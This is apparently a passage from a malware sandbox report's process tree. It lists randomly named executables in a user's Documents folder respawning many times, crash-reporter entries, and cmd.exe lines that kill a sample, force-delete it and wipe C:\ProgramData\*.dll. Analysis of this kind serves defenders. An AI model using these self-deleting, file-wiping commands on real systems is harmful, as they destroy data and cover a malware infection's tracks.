        C:\Windows\SysWOW64\WerFault.exe -u -p 15188 -s 28
        13⤵
        Program crash
        
        PID:23144
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:25656
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:30268
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:26440
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:32632
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:21464
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:32344
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:31952
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:28996
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:27156
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:19912
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:8160
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:33108
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:31320
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:32800
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:27944
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:30112
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:33568
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:33708
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:2944
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:15080
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:2168
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:29860
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:11280
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:17720
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:31864
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:19352
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:34168
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:29744
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:34308
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:33668
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:26892
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:26000
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:30940
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:33960
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:29804
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:19840
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:33016
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:35376
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:9508
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:36088
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:35348
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:24264
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:17828
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:22312
        
        C:\Users\Admin\Documents\5RtddOjLvpjdX4L8dUGlaasf.exe
        
        "C:\Users\Admin\Documents\5RtddOjLvpjdX4L8dUGlaasf.exe"
        11⤵
        
        PID:1300
        
        C:\Users\Admin\Documents\5RtddOjLvpjdX4L8dUGlaasf.exe
        
        "C:\Users\Admin\Documents\5RtddOjLvpjdX4L8dUGlaasf.exe"
        12⤵
        
        PID:8276
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im 5RtddOjLvpjdX4L8dUGlaasf.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\5RtddOjLvpjdX4L8dUGlaasf.exe" & del C:\ProgramData\*.dll & exit
        13⤵
        
        PID:7408
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im 5RtddOjLvpjdX4L8dUGlaasf.exe /f
        14⤵
        Kills process with taskkill
        
        PID:11204
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        14⤵
        Delays execution with timeout.exe
        
        PID:12092
        
        C:\Users\Admin\Documents\I71Z7ipHVnjTBhsQBRq8F9CV.exe
        
        "C:\Users\Admin\Documents\I71Z7ipHVnjTBhsQBRq8F9CV.exe"
        11⤵
        
        PID:1080
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 280
        12⤵
        Program crash
        
        PID:6184
        
        C:\Users\Admin\Documents\Z6TxdHjJu_4yLFn8E7ESiqj6.exe
        
        "C:\Users\Admin\Documents\Z6TxdHjJu_4yLFn8E7ESiqj6.exe"
        11⤵
        
        PID:1088
        
        C:\Users\Admin\Documents\gNFNEVK2g5N_o3mBAcxajsjQ.exe
        
        "C:\Users\Admin\Documents\gNFNEVK2g5N_o3mBAcxajsjQ.exe"
        11⤵
        
        PID:4360
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\gNFNEVK2g5N_o3mBAcxajsjQ.exe"
        12⤵
        
        PID:3036
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        13⤵
        Delays execution with timeout.exe
        
        PID:6308
        
        C:\Users\Admin\Documents\srFyWHY6WRa5_WSlKzO3Xbh9.exe
        
        "C:\Users\Admin\Documents\srFyWHY6WRa5_WSlKzO3Xbh9.exe"
        11⤵
        
        PID:1636
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 280
        12⤵
        Program crash
        
        PID:6792
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        "C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe"
        11⤵
        
        PID:2960
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:6640
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:7056
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:5400
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:4800
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:664
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:6296
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:7512
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:8088
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:8132
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:7984
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:6700
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:6364
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:8356
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:8844
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:6888
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:7616
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:8868
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:6660
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:9908
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:9580
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:7036
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:9664
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:9552
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:8476
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:10176
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:8768
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:10248
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:10788
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:10312
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:11208
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:3668
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:10868
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:11616
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:12104
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:6724
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:3088
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:12056
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:11260
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:11324
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:7472
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:3316
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:4016
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:12932
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:12544
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:13232
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:12312
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:1296
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:1168
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:12728
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:14220
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:13864
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:11020
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:10604
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:4860
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 28
        13⤵
        Program crash
        
        PID:1544
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:4004
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:9672
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:14608
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:11680
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:8872
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:14500
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:10820
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:5036
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:7004
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:2620
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:15372
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:15896
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:7960
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:16016
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:15148
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:12828
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:11296
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:15992
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:16548
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:17172
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:16488
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:17348
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:11820
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:16752
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:18040
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:17924
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:18404
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:12664
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:17428
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:14736
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:19028
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 19028 -s 28
        13⤵
        Program crash
        Suspicious behavior: EnumeratesProcesses
        
        PID:1732
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
